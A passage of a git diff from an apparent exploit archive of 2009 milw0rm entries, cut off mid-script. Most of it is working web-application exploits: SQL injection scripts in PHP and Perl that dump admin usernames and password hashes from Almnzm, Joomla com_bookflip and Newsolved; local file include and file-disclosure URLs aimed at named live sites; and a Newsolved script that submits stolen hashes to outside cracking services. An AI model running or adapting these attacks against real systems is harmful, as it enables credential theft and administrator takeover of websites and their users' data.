+    can be abused to execute a blind sql injection attack by an unauthenticated
+    attacker.
+
+    The vendor has provided a new release v1.6 RC5 which addresses this vulnerability.
+    They have also provided patching instructions [2] should you be unable to perform
+    a full upgrade at this time.
+
+    One sample attack string might look similar to the following:
+    '+(SELECT IF(SUBSTRING(passwd,1,1)=CHAR(48),BENCHMARK(1000000,SHA1(1)),0) passwd
+    FROM ost_staff where staff_id=1) and '1'='1
+
+  III. REFERENCES
+    [1] - http://www.osticket.com
+    [2] - http://osticket.com/forums/project.php?issueid=118
+
+  IV. VENDOR COMMUNICATION
+    3.25.2009 - Vulnerability Discovery
+    3.25.2009 - Vendor notification & initial vendor response
+    6.26.2009 - Vendor releases fix in osTicket v1.6 RC5 
+
+# milw0rm.com [2009-06-29]
diff --git a/platforms/php/webapps/9035.txt b/platforms/php/webapps/9035.txt
index 56e20af4c..f06ba7353 100755
--- a/platforms/php/webapps/9035.txt
+++ b/platforms/php/webapps/9035.txt
@@ -1,88 +1,88 @@
-<?
-print_r('
-                                       ||          ||   | ||
-                                o_,_7 _||  . _o_7 _|| q_|_||  o_///_,
-                               (  :  /    (_)    /           (      .
-
-                                        ___________________
-                                      _/QQQQQQQQQQQQQQQQQQQ\__
----Script Almnzm SQL INJECTION     __/QQQ/````````````````\QQQ\___
-                                 _/QQQQQ/                  \QQQQQQ\
----"Powered by Almnzm"          /QQQQ/``                    ```QQQQ\
-                               /QQQQ/                          \QQQQ\
----admin cookie create        |QQQQ/    By  Qabandi             \QQQQ|
----Add PhP Ext                |QQQQ|                            |QQQQ|
----Upload php in adminCP      |QQQQ|    From Kuwait, PEACE...   |QQQQ|
-                              |QQQQ|                            |QQQQ|
-                              |QQQQ\       iqa[a]hotmail.fr     /QQQQ|
-                               \QQQQ\                      __  /QQQQ/
-                                \QQQQ\                    /QQ\_QQQQ/
-                                 \QQQQ\                   \QQQQQQQ/
-                                  \QQQQQ\                 /QQQQQ/_
-                                   ``\QQQQQ\_____________/QQQ/\QQQQ\_
-                                      ``\QQQQQQQQQQQQQQQQQQQ/  `\QQQQ\
-');
-
-if ($argc<3) {
-print_r('
------------------------------------------------------------------------------
-Usage: php '.$argv[0].' localhost /mnzm/
------------------------------------------------------------------------------
-');
-die;
-}
-$host = $argv[1];
-$p = "http://".$host.$argv[2];
-
- function QAB_GET($qabandi, $from){
-$content = $from;
-preg_match_all("/<".$qabandi.">([^<]+)<\/".$qabandi.">/",
-    $content,
-    $out, PREG_PATTERN_ORDER);
-
-return $out[1][0];
- }
-
-
-
-          $packet ="GET ".$p."index.php?action=creatticket&step=2 HTTP/1.0\r\n";
-          $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
-          $packet.="Pragma: no-cache\r\n";
-          $packet.="Cookie: customer=LTInIFVuSW9OIFNlTGVDdCAxLGNvbmNhdChDSEFSKDYwLDExOCwxMDEsMTE0LDExNSwxMDUsMTExLDExMCw2MiksVmVSc0lvTigpLENIQVIoNjAsNDcsMTE4LDEwMSwxMTQsMTE1LDEwNSwxMTEsMTEwLDYyKSksY29uY2F0KENIQVIoNjAsMTA5LDk3LDEwNSwxMDgsNjIpLGVtYWlsLENIQVIoNjAsNDcsMTA5LDk3LDEwNSwxMDgsNjIpKSw0LDUsNixjb25jYXQoQ0hBUig2MCwxMTIsOTcsMTE1LDExNSw2MikscGFTU1dvcmQsQ0hBUig2MCw0NywxMTIsOTcsMTE1LDExNSw2MikpLDgsY29uY2F0KENIQVIoNjAsMTE3LDExNSwxMDEsMTE0LDYyKSxuQU1FLENIQVIoNjAsNDcsMTE3LDExNSwxMDEsMTE0LDYyKSksMTAsMTEsMTIsMTMsMTQsMTUsMTYsMTcsMTgsMTksMjAsMjEsMjIsMjMgZlJPbSBNT0RlckFUb3JzICAvKjpxYWJhbmRpOnFhYmFuZGk=".";\r\n";
-          $packet.="Connection: Close\r\n\r\n";
-	$o = @fsockopen($host, 80);
-	if(!$o){
-		echo "\n[x] No response...\n";
-		die;
-	}
-	
-	fputs($o, $packet);
-	while (!feof($o)) $data .= fread($o, 1024);
-	fclose($o);
-	
-	$_404 = strstr( $data, "HTTP/1.1 404 Not Found" );
-	if ( !empty($_404) ){
-		echo "\n[x] 404 Not Found... Make sure of path. \n";
-		die;
-	}
-	
-echo "\n\n---Qabandi Is Here-------------------------------------------\n\n";
-
-$Q_ver = QAB_GET("version", $data);
-$Q_usr = QAB_GET("user", $data);
-$Q_pwd = QAB_GET("pass", $data);
-
-
-echo "[q]version:\n".$Q_ver."\n\n";
-echo "[q]Admin User:\n".$Q_usr."\n\n";
-echo "[q]Admin Hash:\n".$Q_pwd."\n\n";
-
-$qookie = base64_encode(":".$Q_usr.":".$Q_pwd);
-
-echo "\n---Admin Cookie:\n";
-echo "\n\njavascript:document.cookie='user=".$qookie."';\n\n";
-echo "\n\n---Qabandi Was Here------------------------------------------\n\n";
-die;
-?>
-
-# milw0rm.com [2009-06-29]
+<?
+print_r('
+                                       ||          ||   | ||
+                                o_,_7 _||  . _o_7 _|| q_|_||  o_///_,
+                               (  :  /    (_)    /           (      .
+
+                                        ___________________
+                                      _/QQQQQQQQQQQQQQQQQQQ\__
+---Script Almnzm SQL INJECTION     __/QQQ/````````````````\QQQ\___
+                                 _/QQQQQ/                  \QQQQQQ\
+---"Powered by Almnzm"          /QQQQ/``                    ```QQQQ\
+                               /QQQQ/                          \QQQQ\
+---admin cookie create        |QQQQ/    By  Qabandi             \QQQQ|
+---Add PhP Ext                |QQQQ|                            |QQQQ|
+---Upload php in adminCP      |QQQQ|    From Kuwait, PEACE...   |QQQQ|
+                              |QQQQ|                            |QQQQ|
+                              |QQQQ\       iqa[a]hotmail.fr     /QQQQ|
+                               \QQQQ\                      __  /QQQQ/
+                                \QQQQ\                    /QQ\_QQQQ/
+                                 \QQQQ\                   \QQQQQQQ/
+                                  \QQQQQ\                 /QQQQQ/_
+                                   ``\QQQQQ\_____________/QQQ/\QQQQ\_
+                                      ``\QQQQQQQQQQQQQQQQQQQ/  `\QQQQ\
+');
+
+if ($argc<3) {
+print_r('
+-----------------------------------------------------------------------------
+Usage: php '.$argv[0].' localhost /mnzm/
+-----------------------------------------------------------------------------
+');
+die;
+}
+$host = $argv[1];
+$p = "http://".$host.$argv[2];
+
+ function QAB_GET($qabandi, $from){
+$content = $from;
+preg_match_all("/<".$qabandi.">([^<]+)<\/".$qabandi.">/",
+    $content,
+    $out, PREG_PATTERN_ORDER);
+
+return $out[1][0];
+ }
+
+
+
+          $packet ="GET ".$p."index.php?action=creatticket&step=2 HTTP/1.0\r\n";
+          $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
+          $packet.="Pragma: no-cache\r\n";
+          $packet.="Cookie: customer=LTInIFVuSW9OIFNlTGVDdCAxLGNvbmNhdChDSEFSKDYwLDExOCwxMDEsMTE0LDExNSwxMDUsMTExLDExMCw2MiksVmVSc0lvTigpLENIQVIoNjAsNDcsMTE4LDEwMSwxMTQsMTE1LDEwNSwxMTEsMTEwLDYyKSksY29uY2F0KENIQVIoNjAsMTA5LDk3LDEwNSwxMDgsNjIpLGVtYWlsLENIQVIoNjAsNDcsMTA5LDk3LDEwNSwxMDgsNjIpKSw0LDUsNixjb25jYXQoQ0hBUig2MCwxMTIsOTcsMTE1LDExNSw2MikscGFTU1dvcmQsQ0hBUig2MCw0NywxMTIsOTcsMTE1LDExNSw2MikpLDgsY29uY2F0KENIQVIoNjAsMTE3LDExNSwxMDEsMTE0LDYyKSxuQU1FLENIQVIoNjAsNDcsMTE3LDExNSwxMDEsMTE0LDYyKSksMTAsMTEsMTIsMTMsMTQsMTUsMTYsMTcsMTgsMTksMjAsMjEsMjIsMjMgZlJPbSBNT0RlckFUb3JzICAvKjpxYWJhbmRpOnFhYmFuZGk=".";\r\n";
+          $packet.="Connection: Close\r\n\r\n";
+	$o = @fsockopen($host, 80);
+	if(!$o){
+		echo "\n[x] No response...\n";
+		die;
+	}
+	
+	fputs($o, $packet);
+	while (!feof($o)) $data .= fread($o, 1024);
+	fclose($o);
+	
+	$_404 = strstr( $data, "HTTP/1.1 404 Not Found" );
+	if ( !empty($_404) ){
+		echo "\n[x] 404 Not Found... Make sure of path. \n";
+		die;
+	}
+	
+echo "\n\n---Qabandi Is Here-------------------------------------------\n\n";
+
+$Q_ver = QAB_GET("version", $data);
+$Q_usr = QAB_GET("user", $data);
+$Q_pwd = QAB_GET("pass", $data);
+
+
+echo "[q]version:\n".$Q_ver."\n\n";
+echo "[q]Admin User:\n".$Q_usr."\n\n";
+echo "[q]Admin Hash:\n".$Q_pwd."\n\n";
+
+$qookie = base64_encode(":".$Q_usr.":".$Q_pwd);
+
+echo "\n---Admin Cookie:\n";
+echo "\n\njavascript:document.cookie='user=".$qookie."';\n\n";
+echo "\n\n---Qabandi Was Here------------------------------------------\n\n";
+die;
+?>
+
+# milw0rm.com [2009-06-29]
diff --git a/platforms/php/webapps/9036.txt b/platforms/php/webapps/9036.txt
index da6ca4d2d..2ab274960 100755
--- a/platforms/php/webapps/9036.txt
+++ b/platforms/php/webapps/9036.txt
@@ -1,20 +1,20 @@
-                =-=-local file include-=-=
-
--=-=-=-=-=-=-=-=-=-=-=-
-script: PHP-Sugar 0.80
------------------------
-Author: ahmadbady
-my site :Coming Soon
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-download from:http://php-sugar.net/files/?mod=files
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 
-if (isset($_GET['t']))
-	$file = $_GET['t'];
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-xpl:
-/path/test/index.php?t=..//..//..//..//..//boot.ini%00
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-
-
-# milw0rm.com [2009-06-29]
+                =-=-local file include-=-=
+
+-=-=-=-=-=-=-=-=-=-=-=-
+script: PHP-Sugar 0.80
+-----------------------
+Author: ahmadbady
+my site :Coming Soon
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+download from:http://php-sugar.net/files/?mod=files
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 
+if (isset($_GET['t']))
+	$file = $_GET['t'];
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+xpl:
+/path/test/index.php?t=..//..//..//..//..//boot.ini%00
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-
+
+# milw0rm.com [2009-06-29]
diff --git a/platforms/php/webapps/9037.txt b/platforms/php/webapps/9037.txt
index a62dcaa0b..7a7c82874 100755
--- a/platforms/php/webapps/9037.txt
+++ b/platforms/php/webapps/9037.txt
@@ -1,21 +1,21 @@
-#################################################################################################################
-[+] Clicknet CMS v2.1(side) File Disclosure Vulnerability
-[+] Discovered By ThE g0bL!N
-[+] Vendor:http://cms.clicknet.dk
-[+} Download:http://cms.clicknet.dk/download/index.php?test=2
-[+] Dork:"Powered by Clicknet CMS"
-[+] Note: All Site Danemark So Fuck It please :)
-[+] Greets : R3d-D3v!L
-#################################################################################################################
-Exploit:
--------
-Exploit
----
-http://127.0.0.1/index.php?side=../index [ out of .php ]
-Then View Source To Get A good View
-Demo
-----
-http://www.t68.clicknet.dk/index.php?side=../index
-################################################################################################################
-
-# milw0rm.com [2009-06-29]
+#################################################################################################################
+[+] Clicknet CMS v2.1(side) File Disclosure Vulnerability
+[+] Discovered By ThE g0bL!N
+[+] Vendor:http://cms.clicknet.dk
+[+} Download:http://cms.clicknet.dk/download/index.php?test=2
+[+] Dork:"Powered by Clicknet CMS"
+[+] Note: All Site Danemark So Fuck It please :)
+[+] Greets : R3d-D3v!L
+#################################################################################################################
+Exploit:
+-------
+Exploit
+---
+http://127.0.0.1/index.php?side=../index [ out of .php ]
+Then View Source To Get A good View
+Demo
+----
+http://www.t68.clicknet.dk/index.php?side=../index
+################################################################################################################
+
+# milw0rm.com [2009-06-29]
diff --git a/platforms/php/webapps/9040.txt b/platforms/php/webapps/9040.txt
index 5a15abab1..3a4a23253 100755
--- a/platforms/php/webapps/9040.txt
+++ b/platforms/php/webapps/9040.txt
@@ -1,51 +1,51 @@
-#!/usr/bin/perl -w
-
-#Joomla com_bookflip(book_id) Sql injection#
-########################################
-#[~] Author : boom3rang
-#[~] Greetz : H!tm@N - KHG - cHs - LiTTLE-HaCkEr - SpywarrioR - cRu3l.b0y - Lanti-Net - urtan
-#---------------------------------------
-#[!] <name>BookFlip</name>
-#[!] <creationDate>Juin 2008</creationDate>
-#[!] <author>FCI F-Cimag-In</author>
-#[!] <copyright>Ce composant est distribué gratuitement.</copyright>
-#[!] <authorEmail>postmaster@f-cimag-in.com</authorEmail>
-#[!] <authorUrl>www.f-cimag-in.com</authorUrl>
-#[!] <version>2.1</version>
-#---------------------------------------
-#[!] Google_Dork: inurl:"com_bookflip"
-########################################
-
-system("color FF0000");
-print "\t ###############################################################\n\n";
-print "\t #           Kosova Hackers Group (KHG-CREW)                   #\n\n";
-print "\t ###############################################################\n\n";
-print "\t # - Joomla com_bookflip(book_id)Remote SQL Injection Vuln     #\n\n";
-print "\t # - R.I.P redc00de                                            #\n\n";
-print "\t # - Cod3d by boom3rang                                        #\n\n";
-print "\t ###############################################################\n\n";
-use LWP::UserAgent;
-print "\nTarget page:[http://wwww.localhost/pathdir/]: ";
-chomp(my $target=<STDIN>);
-#Column Name
-$c_n="concat(username,0x3a,password)";
-#Table_name
-$t_n="jos_users";
-$U="-9999+UNION+SELECT+";
-$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
-$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
-$host = $target . "/index.php?option=com_bookflip&book_id=".$U."1,".$c_n.",3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from/**/".$t_n."+--+";
-$res = $b->request(HTTP::Request->new(GET=>$host));
-$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
-print "\n[+] Admin Hash : $1\n\n";
-print "# Veprimi mbaroi me sukses(Congratulations)! #\n\n";
-}
-else{print "\n[-] Veprimi Deshtoi (Not Found)...\n";
-}
-
-########################
-# - Proud 2 be Albanian
-# - Proud 2 be Muslim
-########################
-
-# milw0rm.com [2009-06-29]
+#!/usr/bin/perl -w
+
+#Joomla com_bookflip(book_id) Sql injection#
+########################################
+#[~] Author : boom3rang
+#[~] Greetz : H!tm@N - KHG - cHs - LiTTLE-HaCkEr - SpywarrioR - cRu3l.b0y - Lanti-Net - urtan
+#---------------------------------------
+#[!] <name>BookFlip</name>
+#[!] <creationDate>Juin 2008</creationDate>
+#[!] <author>FCI F-Cimag-In</author>
+#[!] <copyright>Ce composant est distribué gratuitement.</copyright>
+#[!] <authorEmail>postmaster@f-cimag-in.com</authorEmail>
+#[!] <authorUrl>www.f-cimag-in.com</authorUrl>
+#[!] <version>2.1</version>
+#---------------------------------------
+#[!] Google_Dork: inurl:"com_bookflip"
+########################################
+
+system("color FF0000");
+print "\t ###############################################################\n\n";
+print "\t #           Kosova Hackers Group (KHG-CREW)                   #\n\n";
+print "\t ###############################################################\n\n";
+print "\t # - Joomla com_bookflip(book_id)Remote SQL Injection Vuln     #\n\n";
+print "\t # - R.I.P redc00de                                            #\n\n";
+print "\t # - Cod3d by boom3rang                                        #\n\n";
+print "\t ###############################################################\n\n";
+use LWP::UserAgent;
+print "\nTarget page:[http://wwww.localhost/pathdir/]: ";
+chomp(my $target=<STDIN>);
+#Column Name
+$c_n="concat(username,0x3a,password)";
+#Table_name
+$t_n="jos_users";
+$U="-9999+UNION+SELECT+";
+$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+$host = $target . "/index.php?option=com_bookflip&book_id=".$U."1,".$c_n.",3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from/**/".$t_n."+--+";
+$res = $b->request(HTTP::Request->new(GET=>$host));
+$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
+print "\n[+] Admin Hash : $1\n\n";
+print "# Veprimi mbaroi me sukses(Congratulations)! #\n\n";
+}
+else{print "\n[-] Veprimi Deshtoi (Not Found)...\n";
+}
+
+########################
+# - Proud 2 be Albanian
+# - Proud 2 be Muslim
+########################
+
+# milw0rm.com [2009-06-29]
diff --git a/platforms/php/webapps/9041.txt b/platforms/php/webapps/9041.txt
index c538f7a43..47252e11d 100755
--- a/platforms/php/webapps/9041.txt
+++ b/platforms/php/webapps/9041.txt
@@ -1,26 +1,26 @@
-#################################################################################################################
-[+] Audio Article Directory Remote File Disclosure Vulnerability
-[+] Discovered By ThE g0bL!N
-Vendor:http://audioarticledirectory.com
-#################################################################################################################
-Poc
----
-Download.php
-<?
-$file = "./".$_GET['file']; => one
- header('Content-Description: File Transfer');
-           header('Content-Type: application/force-download');
-           header("Content-Disposition: attachment; filename=\"".basename($file)."\";");
-           header('Content-Length: ' . filesize($file));
-@readfile($file) OR die(); => 2
-?>
-Exploit
-----
-http://victim/download.php?file=download.php
-http://victim/download.php?file=./passwords.php
-Demo
-----
-http://audioarticledirectory.com/demo/download.php?file=./passwords.php
-################################################################################################################
-
-# milw0rm.com [2009-06-29]
+#################################################################################################################
+[+] Audio Article Directory Remote File Disclosure Vulnerability
+[+] Discovered By ThE g0bL!N
+Vendor:http://audioarticledirectory.com
+#################################################################################################################
+Poc
+---
+Download.php
+<?
+$file = "./".$_GET['file']; => one
+ header('Content-Description: File Transfer');
+           header('Content-Type: application/force-download');
+           header("Content-Disposition: attachment; filename=\"".basename($file)."\";");
+           header('Content-Length: ' . filesize($file));
+@readfile($file) OR die(); => 2
+?>
+Exploit
+----
+http://victim/download.php?file=download.php
+http://victim/download.php?file=./passwords.php
+Demo
+----
+http://audioarticledirectory.com/demo/download.php?file=./passwords.php
+################################################################################################################
+
+# milw0rm.com [2009-06-29]
diff --git a/platforms/php/webapps/9042.pl b/platforms/php/webapps/9042.pl
index 624b483f6..7647d53ef 100755
--- a/platforms/php/webapps/9042.pl
+++ b/platforms/php/webapps/9042.pl
@@ -1,260 +1,260 @@
-#!/usr/bin/perl -w
-# Neversolved.pl
-#
-# Copyright (c) 2009 by <jmp-esp.net>
-#
-# A simple login grabber
-# by lama - 06/23/2009
-#
-# Tested on: Newsolved 1.1.6
-
-use strict;
-use LWP::UserAgent;
-use Getopt::Std;
-use vars qw/ %opt /;
-getopts( "i:p:u:lfh", \%opt );
-
-my @bugs =
-(
-    [
-         "newsscript.php?m=archive&jahr=0'+UnIoN+SeLeCt+CoNcAt('1',':',user,':',pw)+FrOm+[PRE"
-        ."FIX]_intern_users+WhErE+id='[USERID]&jahr_check=ok",
-         "monat_num=1:(.*?):([a-f0-9]{32})"
-    ],
-    [
-         "newsscript.php?m=archive&topic_check=ok&idneu=-1'+UnIoN+SeLeCt+3,CoNcAt(user,':',pw"
-        ."),1,4,1,5,9,2,6,5,3,5,8,9,7,9,3,2,3,8+FrOm+[PREFIX]_intern_users+WhErE+id='[USERID]",
-         "([^>]+):([a-f0-9]{32})<" 
-    ],
-    [
-         "newsscript.php?mailto=ok&newsid=-1'+UnIoN+SeLeCt+1,CoNcAt(user,':',pw),6,1,8,0,3,3,"
-        ."9,8,8,7,4,9,8,9,4,8,4,8+FrOm+[PREFIX]_intern_users+WhErE+id='[USERID]",
-         "<i>(.*?):([a-f0-9]{32})<\/i>" 
-    ]
-);
-
-my @lookups =
-(
-    [
-        'http://md5.rednoize.com/?q=[HASH]&s=md5&go=Search',
-        '',
-        '<div id="result" >(.*?)</div>'
-    ],
-    [
-        'http://milw0rm.com/cracker/search.php',
-        'hash=[HASH]&Submit=Submit',
-        '>[a-f0-9]{32}</TD><TD align="middle" nowrap="nowrap" width=90>(.*?)</TD>'
-    ],
-    [
-        'http://securitystats.com/tools/hashcrack.php',
-        'inputhash=[HASH]&type=MD5&Submit=Submit',
-        '<BR>[a-f0-9]{32} = (.*?)</td>'
-    ],
-    [
-        'http://md5decrypter.com/index.php',
-        'hash=[HASH]&submit=Decrypt',
-        '<b class=\'red\'>Normal Text: </b>(.*?)\n'
-    ]
-);
-
-sub isHost
-{
-    my $target = shift;
-    if ( $target =~ /(?:http:\/\/)?([\w\.\-\_]*)(\/.*)?/ )
-    {
-        my $host = $1;
-        my $folder = ( $2 ? $2 : '/' );
-        if ( $folder !~ /\/$/ ) 
-        { 
-            $folder .= '/';
-        }
-        return "http://$host$folder"; 
-    }
-    else
-    { 
-        return 0;
-    }
-}
-
-sub replacePlaceholder
-{
-    my $search = shift;
-    my $replace = shift;
-    my $placeholder = shift;
-    $search=~s/\[$placeholder\]/$replace/g; 
-    return $search;
-}
-
-sub isVulnerable
-{
-    my $target = shift;
-    my $ua = LWP::UserAgent->new;
-    my $request = new HTTP::Request('GET', $target); 
-    $request->header('User-Agent' => $opt{u});
-    my $response = $ua->request($request);
-    my $body = $response->content;
-    if ($body =~ /mysql_fetch_object/)
-    {
-        return 1;
-    }
-    elsif (!($body =~ /styles_output\.css/))
-    {
-        return 0;    
-    }
-    else
-    {
-        return -1;
-    }
-}
-
-sub getHash
-{
-    my $target = shift;
-    my $regexp = shift;
-    my $ua = LWP::UserAgent->new;
-    my $request = new HTTP::Request('GET', $target); 
-    $request->header('User-Agent' => $opt{u});
-    my $response = $ua->request($request);
-    my $body = $response->content;
-    if ($body =~ /$regexp/)
-    {
-        return ($1, $2);
-    }
-    else
-    {
-        return 0;    
-    }
-}
-
-sub searchPlaintext
-{
-    my $hash = shift;
-    foreach (@lookups)
-    {
-        my $server = replacePlaceholder(@$_[0], $hash, "HASH");
-        my $post = replacePlaceholder(@$_[1], $hash, "HASH");
-        my $ua = LWP::UserAgent->new;
-        my $request = new HTTP::Request('POST', $server); 
-        $request->content("$post"); 
-        $request->content_type('application/x-www-form-urlencoded');
-        $request->header('Referer' => $server);
-        $request->header('User-Agent' => $opt{u});
-        my $response = $ua->request($request);
-        my $body = $response->content;
-        if ($body =~ /@$_[2]/)
-        {
-            return $1;
-        }
-
-    }
-    return 0;
-}
-
-sub attackTarget
-{
-    my $target = shift;
-    my $userid = shift;
-    foreach (@bugs)
-    {
-        my $bug = @$_[0];
-        $bug = replacePlaceholder($bug, $userid, "USERID");
-        $bug = replacePlaceholder($bug, $opt{p}, "PREFIX");
-        (my $username, my $password) = getHash($target.$bug, @$_[1]);
-        if (($username) && ($password))
-        {
-            return ($username, $password);
-        }
-    }
-    return 0;
-}
-
-sub showHelp
-{
-    print "Newsolved <= 1.1.6 Sploiter ( jmp-esp.net )\n"
-        . "Usage: $0 [options] Victim\n"
-        . "OPTIONS\n"
-        . " -i integer: Userid [1]\n"
-        . " -u string: Useragent [IE]\n"
-        . " -p string: Prefix [newsolved]\n"
-        . " -f: Force [optional]\n"
-        . " -l: Lookup [optional]\n"
-        . " -h: Help [optional]\n"
-        . "EXAMPLES\n"
-        . " ./$0 http://pentagon.gov/news/\n"
-        . " ./$0 -f -i 4 http://omnomnom.com/\n"
-        . "OTHER\n"
-        . " Magic_Quotes_GPC needs to be off\n";
-}
-
-sub showBanner
-{
-    print "  __                                          \n"
-        . " |__|.--------.-----.______.-----.-----.-----.\n"
-        . " |  ||        |  _  |______|  -__|__ --|  _  |\n"
-        . " |  ||__|__|__|   __|      |_____|_____|   __|\n"
-        . "|___|         |__|    lama  06/23/2009 |__|   \n"
-        . "Kampfgeschrei!\n\n";    
-}
-
-if ($opt{h})
-{
-    showHelp();
-    exit;
-}
-
-my $victim = shift;
-if (!($victim) || !($victim = isHost($victim)))
-{
-    showHelp();
-    exit;    
-}
-
-$opt{u} = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' if (!$opt{u});
-$opt{i} = '1' if (!$opt{i});
-$opt{p} = 'newsolved' if (!$opt{p});
-
-if (scalar(@bugs) < 1)
-{
-    print "Bugs or gtfo. Srsly.\n";
-    exit;
-}
-
-my $vulnerability = isVulnerable($victim.$bugs[0][0]);
-if ($vulnerability == 0)
-{
-    print "This doesn't look like Newsolved. Read the help, now.\n\n";
-    showHelp();
-    exit if (!$opt{f});
-}
-elsif ($vulnerability == -1)
-{
-    print "Magic_Quotes_Gpc seems to be on. Read the help, now.\n\n";
-    showHelp();
-    exit if (!$opt{f});
-}
-
-showBanner();
-(my $username, my $password) = attackTarget($victim, $opt{i});
-if ($username)
-{
-    print "Target:\t\t".isHost($victim)." ( ID: ".$opt{i}." )\n";
-    print "Username:\t$username\nPassword:\t$password\n";
-    if ($opt{l})
-    {
-        my $cleartext = searchPlaintext($password);
-        if ($cleartext)
-        {
-            print "Cleartext:\t$cleartext\n";
-        }
-        else
-        {
-            print "Cleartext:\tNot found\n";
-        }
-    }
-}
-else
-{
-    print "Unable to retrieve the password: Is the userid correct?\n";
-}
-
-# milw0rm.com [2009-06-29]
+#!/usr/bin/perl -w
+# Neversolved.pl
+#
+# Copyright (c) 2009 by <jmp-esp.net>
+#
+# A simple login grabber
+# by lama - 06/23/2009
+#
+# Tested on: Newsolved 1.1.6
+
+use strict;
+use LWP::UserAgent;
+use Getopt::Std;
+use vars qw/ %opt /;
+getopts( "i:p:u:lfh", \%opt );
+
+my @bugs =
+(
+    [
+         "newsscript.php?m=archive&jahr=0'+UnIoN+SeLeCt+CoNcAt('1',':',user,':',pw)+FrOm+[PRE"
+        ."FIX]_intern_users+WhErE+id='[USERID]&jahr_check=ok",
+         "monat_num=1:(.*?):([a-f0-9]{32})"
+    ],
+    [
+         "newsscript.php?m=archive&topic_check=ok&idneu=-1'+UnIoN+SeLeCt+3,CoNcAt(user,':',pw"
+        ."),1,4,1,5,9,2,6,5,3,5,8,9,7,9,3,2,3,8+FrOm+[PREFIX]_intern_users+WhErE+id='[USERID]",
+         "([^>]+):([a-f0-9]{32})<" 
+    ],
+    [
+         "newsscript.php?mailto=ok&newsid=-1'+UnIoN+SeLeCt+1,CoNcAt(user,':',pw),6,1,8,0,3,3,"
+        ."9,8,8,7,4,9,8,9,4,8,4,8+FrOm+[PREFIX]_intern_users+WhErE+id='[USERID]",
+         "<i>(.*?):([a-f0-9]{32})<\/i>" 
+    ]
+);
+
+my @lookups =
+(
+    [
+        'http://md5.rednoize.com/?q=[HASH]&s=md5&go=Search',
+        '',
+        '<div id="result" >(.*?)</div>'
+    ],
+    [
+        'http://milw0rm.com/cracker/search.php',
+        'hash=[HASH]&Submit=Submit',
+        '>[a-f0-9]{32}</TD><TD align="middle" nowrap="nowrap" width=90>(.*?)</TD>'
+    ],
+    [
+        'http://securitystats.com/tools/hashcrack.php',
+        'inputhash=[HASH]&type=MD5&Submit=Submit',
+        '<BR>[a-f0-9]{32} = (.*?)</td>'
+    ],
+    [
+        'http://md5decrypter.com/index.php',
+        'hash=[HASH]&submit=Decrypt',
+        '<b class=\'red\'>Normal Text: </b>(.*?)\n'
+    ]
+);
+
+sub isHost
+{
+    my $target = shift;
+    if ( $target =~ /(?:http:\/\/)?([\w\.\-\_]*)(\/.*)?/ )
+    {
+        my $host = $1;
+        my $folder = ( $2 ? $2 : '/' );
+        if ( $folder !~ /\/$/ ) 
+        { 
+            $folder .= '/';
+        }
+        return "http://$host$folder"; 
+    }
+    else
+    { 
+        return 0;
+    }
+}
+
+sub replacePlaceholder
+{
+    my $search = shift;
+    my $replace = shift;
+    my $placeholder = shift;
+    $search=~s/\[$placeholder\]/$replace/g; 
+    return $search;
+}
+
+sub isVulnerable
+{
+    my $target = shift;
+    my $ua = LWP::UserAgent->new;
+    my $request = new HTTP::Request('GET', $target); 
+    $request->header('User-Agent' => $opt{u});
+    my $response = $ua->request($request);
+    my $body = $response->content;
+    if ($body =~ /mysql_fetch_object/)
+    {
+        return 1;
+    }
+    elsif (!($body =~ /styles_output\.css/))
+    {
+        return 0;    
+    }
+    else
+    {
+        return -1;
+    }
+}
+
+sub getHash
+{
+    my $target = shift;
+    my $regexp = shift;
+    my $ua = LWP::UserAgent->new;
+    my $request = new HTTP::Request('GET', $target); 
+    $request->header('User-Agent' => $opt{u});
+    my $response = $ua->request($request);
+    my $body = $response->content;
+    if ($body =~ /$regexp/)
+    {
+        return ($1, $2);
+    }
+    else
+    {
+        return 0;    
+    }
+}
+
+sub searchPlaintext
+{
+    my $hash = shift;
+    foreach (@lookups)
+    {
+        my $server = replacePlaceholder(@$_[0], $hash, "HASH");
+        my $post = replacePlaceholder(@$_[1], $hash, "HASH");
+        my $ua = LWP::UserAgent->new;
+        my $request = new HTTP::Request('POST', $server); 
+        $request->content("$post"); 
+        $request->content_type('application/x-www-form-urlencoded');
+        $request->header('Referer' => $server);
+        $request->header('User-Agent' => $opt{u});
+        my $response = $ua->request($request);
+        my $body = $response->content;
+        if ($body =~ /@$_[2]/)
+        {
+            return $1;
+        }
+
+    }
+    return 0;
+}
+
+sub attackTarget
+{
+    my $target = shift;
+    my $userid = shift;
+    foreach (@bugs)
+    {
+        my $bug = @$_[0];
+        $bug = replacePlaceholder($bug, $userid, "USERID");
+        $bug = replacePlaceholder($bug, $opt{p}, "PREFIX");
